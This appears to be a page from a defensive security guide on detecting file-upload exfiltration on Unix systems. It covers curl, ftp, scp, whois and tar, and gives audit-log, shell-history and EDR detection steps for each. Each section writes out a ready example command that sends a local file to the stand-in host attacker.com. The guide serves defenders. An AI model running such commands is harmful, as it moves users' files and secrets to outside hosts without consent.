File Upload

File Upload Detection and Monitoring on nix Systems

Attackers often leverage file upload tools to exfiltrate sensitive data or transfer malicious files to external command centers. Below are common tools and methods for file uploads on Unix-like systems, along with strategies for detection and monitoring.

Key Commands for File Upload

1. curl Command

Purpose: Transfers data over various protocols (HTTP, HTTPS, FTP).

Example:

URL=http://attacker.com/  
LFILE=file_to_send  
curl -X POST -d @$LFILE $URL

Detection:

  • Focus on -X POST or -d parameters.

  • Verify destination IP/domain.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "curl" | grep "X"

  • Command History:

    history | grep "curl" | grep "X"
cat ~/.bash_history | grep "curl" | grep "X"

  • EDR/XDR Logs: Inspect curl processes for POST or -X usage.

2. ftp Command

Purpose: Transfers files using the FTP protocol.

Example:

RHOST=attacker.com  
ftp $RHOST  
put file_to_send

Detection:

  • Monitor direct ftp usage, especially targeting external hosts.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "ftp"

  • Command History:

    history | grep "ftp"
cat ~/.bash_history | grep "ftp"

  • EDR/XDR Logs: Investigate ftp connections and transfers.

3. scp Command

Purpose: Secure file transfer over SSH.

Example:

RPATH=user@attacker.com:~/file_to_save  
LPATH=file_to_send  
scp $LPATH $RPATH

Detection:

  • Identify anomalous scp usage, especially targeting unfamiliar destinations.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "scp"

  • Command History:

    history | grep "scp"
cat ~/.bash_history | grep "scp"

  • EDR/XDR Logs: Analyze scp processes and associated network events.

4. whois Command

Purpose: Originally used for domain information lookup, it can be abused for data exfiltration.

Example:

RHOST=attacker.com  
RPORT=12345  
LFILE=file_to_send  
whois -h $RHOST -p $RPORT "`cat $LFILE`"

Detection:

  • Monitor -h or -host parameter usage for anomalies.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "whois" | grep "h"

  • Command History:

    history | grep "whois" | grep "h"
cat ~/.bash_history | grep "whois" | grep "h"

  • EDR/XDR Logs: Track whois processes for unusual host connections.

5. tar Command

Purpose: Archives and transfers files, can be used with SSH for remote uploads.

Example:

RHOST=attacker.com  
RUSER=root  
RFILE=/tmp/file_to_send.tar  
LFILE=file_to_send  
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh

Detection:

  • Monitor --rsh-command usage and associated remote connections.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "tar" | grep "\-\-rsh\-command"

  • Command History:

    history | grep "tar" | grep "\-\-rsh\-command"
cat ~/.bash_history | grep "tar" | grep "\-\-rsh\-command"

  • EDR/XDR Logs: Analyze tar processes for unusual parameters.

General Detection Strategies

1. Monitor Network Activity

  • Track outgoing connections, especially to unknown or untrusted IPs/domains.

2. Audit Logs

  • Regularly review /var/log/audit/audit.log for suspicious file transfer commands.

3. Command History

  • Inspect user command history for potential misuse:

    history | grep [command]
cat ~/.bash_history | grep [command]

4. EDR/XDR Solutions

  • Use telemetry to:

    • Correlate process creation events with network activity.

    • Identify anomalous file transfer patterns.

Key Takeaways

  • Tools like curl, ftp, scp, whois, and tar are legitimate but can be misused for data exfiltration.

  • Detection involves monitoring specific parameters, verifying destination endpoints, and correlating logs from various sources.

  • A combination of audit logs, command history, and EDR/XDR telemetry provides a robust framework for detecting unauthorized file uploads.

PreviousBind ShellNextFile Download

Last updated